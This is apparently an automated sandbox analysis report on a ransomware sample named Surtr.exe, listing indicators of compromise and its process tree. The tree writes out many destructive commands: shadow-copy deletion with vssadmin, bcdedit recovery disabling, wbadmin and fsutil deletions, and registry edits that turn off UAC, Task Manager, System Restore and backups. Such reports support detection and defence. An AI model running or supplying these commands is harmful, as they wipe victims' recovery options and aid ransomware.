3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Surtr.exe

pid process

3600 Surtr.exe

Suspicious use of AdjustPrivilegeToken 16 IoCs

Processes:

vssvc.exewbengine.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exe

description	pid	process
Token: SeBackupPrivilege	6952	vssvc.exe
Token: SeRestorePrivilege	6952	vssvc.exe
Token: SeAuditPrivilege	6952	vssvc.exe
Token: SeBackupPrivilege	7288	wbengine.exe
Token: SeRestorePrivilege	7288	wbengine.exe
Token: SeSecurityPrivilege	7288	wbengine.exe
Token: SeSecurityPrivilege	5540	wevtutil.exe
Token: SeBackupPrivilege	5540	wevtutil.exe
Token: SeSecurityPrivilege	7196	wevtutil.exe
Token: SeBackupPrivilege	7196	wevtutil.exe
Token: SeSecurityPrivilege	1904	wevtutil.exe
Token: SeBackupPrivilege	1904	wevtutil.exe
Token: SeSecurityPrivilege	5276	wevtutil.exe
Token: SeBackupPrivilege	5276	wevtutil.exe
Token: SeSecurityPrivilege	6280	wevtutil.exe
Token: SeBackupPrivilege	6280	wevtutil.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

StartMenuExperienceHost.exe

pid process

6336 StartMenuExperienceHost.exe

pid	process
6336	StartMenuExperienceHost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Surtr.execmd.exe

description	pid	process	target process
PID 3600 wrote to memory of 680	3600	Surtr.exe	cmd.exe
PID 3600 wrote to memory of 680	3600	Surtr.exe	cmd.exe
PID 3600 wrote to memory of 680	3600	Surtr.exe	cmd.exe
PID 3600 wrote to memory of 4044	3600	Surtr.exe	cmd.exe
PID 3600 wrote to memory of 4044	3600	Surtr.exe	cmd.exe
PID 3600 wrote to memory of 4044	3600	Surtr.exe	cmd.exe
PID 3600 wrote to memory of 2404	3600	Surtr.exe	cmd.exe
PID 3600 wrote to memory of 2404	3600	Surtr.exe	cmd.exe
PID 3600 wrote to memory of 2404	3600	Surtr.exe	cmd.exe
PID 2404 wrote to memory of 1840	2404	cmd.exe	chcp.com
PID 2404 wrote to memory of 1840	2404	cmd.exe	chcp.com
PID 2404 wrote to memory of 1840	2404	cmd.exe	chcp.com
PID 3600 wrote to memory of 1920	3600	Surtr.exe	cmd.exe
PID 3600 wrote to memory of 1920	3600	Surtr.exe	cmd.exe
PID 3600 wrote to memory of 1920	3600	Surtr.exe	cmd.exe
PID 3600 wrote to memory of 3912	3600	Surtr.exe	cmd.exe
PID 3600 wrote to memory of 3912	3600	Surtr.exe	cmd.exe
PID 3600 wrote to memory of 2992	3600	Surtr.exe	cmd.exe
PID 3600 wrote to memory of 2992	3600	Surtr.exe	cmd.exe
PID 3600 wrote to memory of 1972	3600	Surtr.exe	cmd.exe
PID 3600 wrote to memory of 1972	3600	Surtr.exe	cmd.exe
PID 3600 wrote to memory of 1896	3600	Surtr.exe	cmd.exe
PID 3600 wrote to memory of 1896	3600	Surtr.exe	cmd.exe
PID 3600 wrote to memory of 3024	3600	Surtr.exe	cmd.exe
PID 3600 wrote to memory of 3024	3600	Surtr.exe	cmd.exe
PID 3600 wrote to memory of 2096	3600	Surtr.exe	cmd.exe
PID 3600 wrote to memory of 2096	3600	Surtr.exe	cmd.exe
PID 3600 wrote to memory of 3696	3600	Surtr.exe	cmd.exe
PID 3600 wrote to memory of 3696	3600	Surtr.exe	cmd.exe
PID 3600 wrote to memory of 3384	3600	Surtr.exe	cmd.exe
PID 3600 wrote to memory of 3384	3600	Surtr.exe	cmd.exe
PID 3600 wrote to memory of 1764	3600	Surtr.exe	cmd.exe
PID 3600 wrote to memory of 1764	3600	Surtr.exe	cmd.exe
PID 3600 wrote to memory of 3584	3600	Surtr.exe	cmd.exe
PID 3600 wrote to memory of 3584	3600	Surtr.exe	cmd.exe
PID 3600 wrote to memory of 3352	3600	Surtr.exe	cmd.exe
PID 3600 wrote to memory of 3352	3600	Surtr.exe	cmd.exe
PID 3600 wrote to memory of 100	3600	Surtr.exe	cmd.exe
PID 3600 wrote to memory of 100	3600	Surtr.exe	cmd.exe
PID 3600 wrote to memory of 1420	3600	Surtr.exe	cmd.exe
PID 3600 wrote to memory of 1420	3600	Surtr.exe	cmd.exe
PID 3600 wrote to memory of 644	3600	Surtr.exe	cmd.exe
PID 3600 wrote to memory of 644	3600	Surtr.exe	cmd.exe
PID 3600 wrote to memory of 756	3600	Surtr.exe	cmd.exe
PID 3600 wrote to memory of 756	3600	Surtr.exe	cmd.exe
PID 3600 wrote to memory of 3968	3600	Surtr.exe	cmd.exe
PID 3600 wrote to memory of 3968	3600	Surtr.exe	cmd.exe
PID 3600 wrote to memory of 2268	3600	Surtr.exe	cmd.exe
PID 3600 wrote to memory of 2268	3600	Surtr.exe	cmd.exe
PID 3600 wrote to memory of 4112	3600	Surtr.exe	cmd.exe
PID 3600 wrote to memory of 4112	3600	Surtr.exe	cmd.exe
PID 3600 wrote to memory of 4120	3600	Surtr.exe	cmd.exe
PID 3600 wrote to memory of 4120	3600	Surtr.exe	cmd.exe
PID 3600 wrote to memory of 4128	3600	Surtr.exe	vssadmin.exe
PID 3600 wrote to memory of 4128	3600	Surtr.exe	vssadmin.exe
PID 3600 wrote to memory of 4180	3600	Surtr.exe	cmd.exe
PID 3600 wrote to memory of 4180	3600	Surtr.exe	cmd.exe
PID 3600 wrote to memory of 4232	3600	Surtr.exe	cmd.exe
PID 3600 wrote to memory of 4232	3600	Surtr.exe	cmd.exe
PID 3600 wrote to memory of 4240	3600	Surtr.exe	cmd.exe
PID 3600 wrote to memory of 4240	3600	Surtr.exe	cmd.exe
PID 3600 wrote to memory of 4316	3600	Surtr.exe	cmd.exe
PID 3600 wrote to memory of 4316	3600	Surtr.exe	cmd.exe
PID 3600 wrote to memory of 4324	3600	Surtr.exe	cmd.exe

Views/modifies file attributes 1 TTPs 8 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid process

1812 attrib.exe
6064 attrib.exe
5472 attrib.exe
5720 attrib.exe
4964 attrib.exe
4888 attrib.exe
4696 attrib.exe
5264 attrib.exe

pid	process
1812	attrib.exe
6064	attrib.exe
5472	attrib.exe
5720	attrib.exe
4964	attrib.exe
4888	attrib.exe
4696	attrib.exe
5264	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Surtr.exe
"C:\Users\Admin\AppData\Local\Temp\Surtr.exe"
1⤵
- Checks computer location settings
- Drops desktop.ini file(s)
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:3600

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c mkdir C:\ProgramData\Service
2⤵
PID:680

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c @echo off
2⤵
PID:4044

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c chcp 437
2⤵
- Suspicious use of WriteProcessMemory
PID:2404

C:\Windows\SysWOW64\chcp.com
chcp 437
3⤵
PID:1840

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c mkdir "%TEMP%\Service"
2⤵
PID:1920

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
2⤵
PID:2992

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:5724

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
2⤵
PID:3912

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
3⤵
- Interacts with shadow copies
PID:5676

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
2⤵
PID:1896

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled No
3⤵
- Modifies boot configuration data using bcdedit
PID:5712

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
2⤵
PID:2096

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:5900

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
2⤵
PID:3024

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
3⤵
- Modifies boot configuration data using bcdedit
PID:5892

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
2⤵
PID:1972

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
3⤵
- Interacts with shadow copies
PID:5684

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
2⤵
PID:3696

C:\Windows\system32\fsutil.exe
fsutil.exe usn deletejournal /D C:
3⤵
PID:5208

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
2⤵
PID:1764

C:\Windows\system32\wbadmin.exe
wbadmin.exe delete catalog -quiet
3⤵
- Deletes backup catalog
PID:5140

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
2⤵
PID:3584

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:6160

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
2⤵
PID:100

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:6800

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
2⤵
PID:3352

C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
3⤵
PID:6408

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=unbounded
2⤵
PID:3384

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:6024

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
2⤵
PID:644

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
3⤵
PID:6812

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
2⤵
PID:1420

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
3⤵
PID:6380

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=unbounded
2⤵
PID:2268

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:6844

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
2⤵
PID:4128

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
3⤵
PID:6860

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB
2⤵
PID:4120

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:6916

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
2⤵
PID:4112

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
3⤵
PID:6736

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
2⤵
PID:3968

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
3⤵
PID:6924

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB
2⤵
PID:756

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB
3⤵
- Interacts with shadow copies
PID:6880

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=unbounded
2⤵
PID:4180

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:7472

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB
2⤵
PID:4240

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:7304

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
2⤵
PID:4232

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
3⤵
PID:7276

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
2⤵
PID:4324

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
3⤵
PID:7368

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=unbounded
2⤵
PID:4316

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:7504

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
2⤵
PID:4404

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
3⤵
PID:7408

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB
2⤵
PID:4468

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:7416

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=unbounded
2⤵
PID:4544

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:7588

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB
2⤵
PID:4640

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:7552

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
2⤵
PID:4744

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
3⤵
PID:7660

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=unbounded
2⤵
PID:4724

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:7596

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
2⤵
PID:4660

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
3⤵
PID:7224

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
2⤵
PID:4564

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
3⤵
PID:7560

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
2⤵
PID:4520

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
3⤵
PID:7668

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
2⤵
PID:4788

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
3⤵
PID:7544

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB
2⤵
PID:4780

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:7524

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
2⤵
PID:4840

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
3⤵
PID:7616

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=unbounded
2⤵
PID:4832

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:7604

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
2⤵
PID:4940

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
3⤵
PID:7576

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB
2⤵
PID:4932

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:7568

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=unbounded
2⤵
PID:5020

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:7512

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
2⤵
PID:1416

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
3⤵
PID:7772

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
2⤵
PID:5092

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
3⤵
PID:8008

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=unbounded
2⤵
PID:4916

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:7780

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB
2⤵
PID:5164

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:7752

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
2⤵
PID:5156

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
3⤵
PID:7812

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
2⤵
PID:5232

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
3⤵
PID:7988

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=unbounded
2⤵
PID:5224

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:7868

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB
2⤵
PID:5056

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:7800

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
2⤵
PID:5048

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
3⤵
PID:7788

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB
2⤵
PID:5300

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB
3⤵
- Interacts with shadow copies
PID:7876

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
2⤵
PID:5292

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
3⤵
PID:7820

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=unbounded
2⤵
PID:5376

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:7884

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
2⤵
PID:5432

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
3⤵
PID:7892

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB
2⤵
PID:5424

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:7900

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
2⤵
PID:5392

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
3⤵
PID:8044

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
2⤵
PID:5504

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
3⤵
PID:7828

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB
2⤵
PID:5568

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:8168

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=unbounded
2⤵
PID:5480

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:8020

C:\Windows\SysWOW64\cmd.exe
